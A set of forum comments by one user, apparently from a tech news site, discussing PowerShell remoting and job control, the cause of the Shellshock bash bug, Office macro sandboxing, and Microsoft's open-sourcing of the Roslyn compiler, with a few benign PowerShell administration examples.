Yes, the Unix tradition is to use plain text files. The Windows tradition is to use APIs, possibly backed by XML files. There are advantages and disadvantages to each approach. Personally, I prefer the API approach, as it makes it easier to create robust scripts and procedures that will also carry forward across versions, even if the underlying format changes.

Uffe Seerup

Re: Powershell 5 and W7 / Svr2K8r2

It is the *preview* that installs exclusively on 8.1 and Server 2012R2.

I was looking for a source on which platforms the *final* product will be available.

PowerShell 4 was *also* platform limited during the preview phase, but was backported afterwards.

Uffe Seerup

Re: Powershell 5 and W7 / Svr2K8r2

> It doesn't look like Powershell 5 will be backported to Windows 7 or Server 2008/R2?

Source?

Uffe Seerup

Re: User Interface

> There are many UNIX shells, and it's impossible to compare all

> of them with Powershell and come out with the conclusion that

> "Powershell is the bestest",

Indeed, a comparison with the goal of crowning "the best" makes little sense. Not least because much of PowerShell makes sense mostly on Windows and would add little value on *nix systems. Conversely, the *nix shells with their line-oriented text processing are often at odds with Windows, where you typically need to control things through APIs, XML or similar.

> ... has an interactive prompt that, from my trials, can only be

> accessed while "on" the machine or over RDP

Then you have not tried PowerShell since version 1.0. This first version had no built-in remoting, but could be used across SSH connections.

In PowerShell 2.0 a lot of remoting and job features were added. Many commands take a -ComputerName parameter where you can pass a list of hosts on which the command should execute remotely while returning the output to the controlling console. There is a general Invoke-Command that can execute commands, scripts and functions on remote machines simultaneously and marshal the output back.
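For instance (host names are illustrative):

# Built-in remoting on an ordinary cmdlet - no shelling in required:
Get-EventLog -LogName System -Newest 5 -ComputerName web01, web02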

Uffe Seerup

Re: User Interface

> Really? Get back to us when it can do full system job control.

For jobs control:

Debug-Job, Get-Job, Receive-Job, Remove-Job, Resume-Job, Start-Job, Stop-Job, Suspend-Job, Wait-Job.

Some of these have aliases for shorthand use:

gjb -> Get-Job, rcjb -> Receive-Job, rjb -> Remove-Job, rujb -> Resume-Job, sajb -> Start-Job, spjb -> Stop-Job, sujb -> Suspend-Job, wjb -> Wait-Job

For process control:

Debug-Process, Get-Process, Start-Process, Stop-Process, Wait-Process

Again, with aliases:

gps -> Get-Process, kill -> Stop-Process, ps -> Get-Process, saps -> Start-Process, spps -> Stop-Process, start -> Start-Process

You can start jobs on remote computers without first "shelling" into them. Output from the jobs is marshalled back to the controlling console. It even works if the remote job stops and queries for a value (using Read-Host): the prompt will appear on the controlling console when you poll for the output/status of the job.
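A round trip looks like this (host names are illustrative):

# Kick off work on two remotes, keep working, collect the results later:
$job = Invoke-Command -ComputerName web01, web02 { Get-HotFix } -AsJob
Wait-Job $job | Receive-Job   # each result is tagged with PSComputerName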

Scripts can be workflows. Workflow scripts are restartable, even across system restarts.

So, between using a remote GUI admin interface and scripting, Windows Server is very well covered.

Uffe Seerup

Re: User Interface

> Let's hope the version has a user interface suitable for use on a server...

PowerShell 5

Stunned by Shellshock Bash bug? Patch all you can – or be punished

Uffe Seerup

Re: what else lurks

> Well, the attack is based on a feature of Bash.

No - it is a *bug*. The ability to define functions in env vars was the feature. The unintended consequence of using a poorly implemented parser was that it proceeded to *execute* text that might come *after* the function definition in the env var.

> This means that it's been "out in the open" for the entire existence of the feature

Nope. Nobody ever considered the possibility that extraneous text following such a function definition would be executed *directly*. At least, we *hope* that it was the good guys who found this first. But we really don't know.

> It also points out why it's a bad idea to have so much running with root permissions, besides not sanitizing input.

Yes. And why SUID/setuid is such a monumentally bad idea. It is a deliberate hole in a too simplistic security model.

> The equivalent on a Windows system would be to pass in PowerShell script and .NET binaries through the http request, and then run it all with Administrator permissions.

Not sure I agree. That is such an obviously bad idea that nobody would ever do it. Shellshock is - after all - a bug (unintended behavior). However, there are multiple historic reasons on Unix/Linux that tend to amplify this bug:

1: The (dumb) decision to use env vars to pass parameters through the Common Gateway Interface (CGI). Env vars are stubbornly persistent: they are inherited by all child processes. This serves to make security auditing much harder: you cannot simply audit the script that *received* control directly from CGI; you also have to consider all processes that can ever be launched from the script, its child processes or descendants.

2: An inadequate and too restrictive Unix security model. This led to the invention of SUID/setuid (a hole in the security boundary) because there were still a lot of tasks that "plain users" (or least-privilege daemons) legitimately needed to perform - such as printing, listening on sockets etc. Rather than refining the security model, SUID punched a deliberate hole in it. However, this means that user accounts are frequently not granted rights to access a *resource* or a syscall - rather they are granted the right to launch an *executable* (SUID) that will execute with an effective user (often root, sadly) who has access to the resource. Which means that you have created a culture where you all but *need* to launch processes through system() calls to get the job done. With a proper security model where such rights could be *delegated*, you would not have to invoke external executables.

3: Old software that lingers on even in modern operating systems. It has long been accepted that the bash parser is, well, quirky. The way that it is semi-line-oriented, for instance (definitions only take effect on a line-by-line basis). Today, parser construction is undergraduate stuff; all the principles are well known. The bash code in question was written in another era and by another community where those principles were perhaps not as well known as they are today.

Munich considers dumping Linux for ... GULP ... Windows!

Uffe Seerup

Re: 1800 jobs

Except:

1) The Microsoft HQ is already there. They'll move 15 kilometers to the south in 2016

2) The decision has already been made, planning completed and they are about to start building - if they have not already

3) The decision was taken almost a year ago during the previous administration. The current Stadtrat was elected this March!

It could still be a case of a few mayors having a pet project and wanting to make an impression. But trying to connect the HQ move to this decision is disingenuous.

Panic like it's 1999: Microsoft Office macro viruses are BACK

Uffe Seerup

Re: js and pdf proprietary extension, @big_D

> It's the same as in MS Office

It's similar. But MS Office (since Office 2010) also *sandboxes* documents that have been received from the Internet zone. This applies to files received through email or downloaded through a browser (all browsers support this).

Such files contain a marker in an alternate data stream that specifies that the file came from the "Internet zone".
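You can see the marker yourself with PowerShell 3.0 or later (the file name is illustrative):

# The "Mark of the Web" lives in an NTFS alternate data stream:
Get-Content .\invoice.docx -Stream Zone.Identifier
# Typical content: [ZoneTransfer] followed by ZoneId=3 (3 = Internet zone)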

When Office opens such a file it will open it in a sandboxed process. The entire process runs in "low integrity mode" - and thus whatever its macros may try to do - even if enabled - will be restricted to the permissions of the low-integrity process.

Microsoft C# chief Hejlsberg: Our open-source Apache pick will clear the FUD

Uffe Seerup

Not Apache httpd (the "server"), but the Apache *license*

Microsoft open sourced their C# and VB compiler under the Apache License 2.0 (http://www.apache.org/licenses/LICENSE-2.0), which includes a grant of patent license:

"Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted"

Uffe Seerup

Re: I hope Apple do similar

The Common Language Infrastructure (CLI) has been placed as a standard under ISO. It is open for anyone to implement (as the Mono project did). There is no situation comparable to Java where you had to implement the full stack and pass a (closed source) compliance test.

A prerequisite for ISO adopting the standard was that Microsoft granted any patents essential for the implementation on RAND terms. Microsoft actually granted a free right-to-use for any patents necessary to implement the CLI. And they placed it under the Community Promise.

This is the C# (and VB) *compiler*. Mono already had their own compiler (and did a good job at that - sometimes beating Microsoft to market on new language features) - but not like this one with incremental compilation and every stage of compilation open for interception and/or inspection by the host process.

For years we've heard "It's a trap. Microsoft will sue and force Mono underground". Well, they cannot sue anyone for implementing the ISO standard*. Now they cannot sue anyone for using their own open sourced compiler. There are still a few libraries in the .NET stack which have not been open sourced or put under an ISO standard - but they get fewer and fewer and all the important ones (ASP.NET, MVC, all of the core libraries etc) are now open.

*"Well they can just sue anyway and use their army of lawyers to force you out of business" someone will still claim. Well, no. The community promise has legal estoppel. Should Microsoft sue, a lawyer can point to the promise (a "one-sided contract") and stand a very good chance of having the case dismissed outright.

Uffe Seerup

Re: Thought I was losing my mind..

> That sound like a reusable parser, which is not novel or unusual.

Never claimed it was novel. However, "reusable parser" hardly does Roslyn justice. First of all, it is not just the "parser" - the lexer, scanner, parser, type analysis, inference engine, code generation etc. are all open for hooking by a hosting process.

Furthermore the "compiler" supports incremental compilation where the host process can subscribe to events about incremental changes for each step of the compilation process (lexer, parser, type analysis, codegen, etc). This allows virtual "no compile" scenarios where the output appears to always be in sync with the source - because only the parts actually affected by each code change will be recompiled. The typical compiler - even with reusable parsers - have much more coarse grained dependency graphs than what is available in Roslyn.

> Most IDEs nowadays use this approach for syntax highlighting and associated warnings.

Indeed - but to support those features, the IDEs often implement more than half of their own compiler (excluding the codegen), because they need more sophisticated error recovery, more information about types/type analysis, and (much) more sophisticated pattern recognition to identify possible code smells or refactoring candidates than what is typically offered by a reusable parser.

In Roslyn you can hook into the compiler/parser and directly use the "compiler" to perform even global refactorings - simply by manipulating the compiler structures.

> That's not the same as releasing the blueprints of a sophisticated virtual machine implementation, it's just documenting the bytecode.

Releasing the specification ensures that the *specification* is known. Having it placed under ISO means that Microsoft cannot just change it on a whim. It goes to trust. Remember the debacle about how Office documents were defined by whatever MS Office did? How many other execution systems have been standardized in a similar way? The Java VM spec is still owned by Oracle, not by any vendor-independent standards organization.

Incidentally, while the JIT probably has some optimization tricks up its sleeve, most of the important optimizations will happen at the semantic level within the compiler that is now open source. This will benefit Mono a lot. Once they switch to Roslyn it should be interesting to see what happens over at the computer language shootout.

Uffe Seerup

CLI is an open specification

Microsoft's *implementation* is not open source (yet), but the specification is an open ISO specification.

http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-335.pdf

Microsoft grants a patent license for any Microsoft patent necessary to implement the spec.

Mono has implemented a CLI according to the specification.

The specification has also been placed under the Community Promise

http://www.microsoft.com/openspecifications/en/us/programs/community-promise/covered-specifications/default.aspx

Uffe Seerup
Boffin

Re: Thought I was losing my mind..

The Roslyn "compiler" is so much more than a mere producer of bytecode. The big thing of Roslyn is how it opens up its internal services and allows tool makers (IDE authors, refactoring authors, reporting/analytics, metaprogramming, code generators, etc etc) to use the parts of the compiler that applies to their problem.

For instance, Microsoft has demonstrated how Roslyn in a few lines of code can be used to implement style warnings and automate style fixes (such as missing curly braces) in a way that *any* IDE or tool based on Roslyn can pick up and use right away.

BTW - the "core" .NET infrastructure (the CLR and the core libraries) are already open specifications which anyone can implement the way Mono did. The specifications has been adopted as ISO standards and comes with patent grants (you are automatically granted license to any Microsoft patent necessary to implement the CLR and core libraries). Furthermore, the CLR and core libraries specification has been placed under the Community Promise to address concerns that Microsoft could just sue anyway and win not by being right but by having more lawyers.

The Community Promise has (at least in the US) legal estoppel - meaning that it would be trivial to have a case where Microsoft asserts its patents against an implementation thrown out of court outright - even with possible retribution against the officers of the court who brought such a frivolous case. Meaning that Microsoft would have a hard time finding such lawyers.
